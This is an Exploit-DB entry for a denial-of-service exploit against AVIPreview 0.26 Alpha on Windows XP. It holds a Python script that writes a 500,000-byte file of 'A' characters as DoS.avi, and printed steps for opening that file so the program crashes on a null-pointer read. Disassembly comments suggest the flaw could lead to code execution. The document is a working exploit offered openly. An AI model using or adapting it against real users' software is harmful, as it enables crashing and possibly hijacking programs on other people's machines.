AVIPreview 0.26 Alpha - Denial of Service

Author: BraniX
type: dos
platform: windows
port: 
date_added: 2011-03-16 
date_updated: 2011-03-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt17000/screen-shot-2011-03-16-at-64001-am.png 
application_url: http://www.exploit-db.comavipreview_by_aj_026_alpha.zip

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.03.15
# published: 2011.03.15
# tested on: Windows XP SP3 Home Edition

# App:              AVIPreview 0.26 Alpha
# App Url:          http://www.divx-digest.com/software/avipreview_aj.html
# AVIPreview.exe    MD5: 399ab43edd26c655d0876dc5ddcaa3a7

# DoS is caused by Access Violation Exception, app reads memory via null pointer

# 00405B59  8B0D E0B14100   MOV ECX,DWORD PTR DS:[41B1E0]       <-- Read from .data section DD 0h
# 00405B5F  8B11            MOV EDX,DWORD PTR DS:[ECX]          <-- Exception, but if EDX is a pointer to SH
# 00405B61  A1 E0B14100     MOV EAX,DWORD PTR DS:[41B1E0]
# 00405B66  50              PUSH EAX
# 00405B67  FF52 30         CALL DWORD PTR DS:[EDX+30]          <-- We will have LCE

# if exploiter can force something minigfull to ECX (.data is RW)
# so he/she will have code execution

path = "C:\\DoS.avi"
f = open(path, "wb")
f.write('\x41' * 500000)
f.close()

print "File generated: " + path
print "In order to DoS AVIPreview 0.26 Alpha execute following steps\n"

print "1. Open file '" + path + "'in AVIPreview, application will show MessageBox with error, but will not crash"
print "2. Select 'No', otherway AVIPreview will pop-up browser"
print "3. Navigate to File menu and pick recent file (which point to our AVI file)"
print "4. You have DoS :>"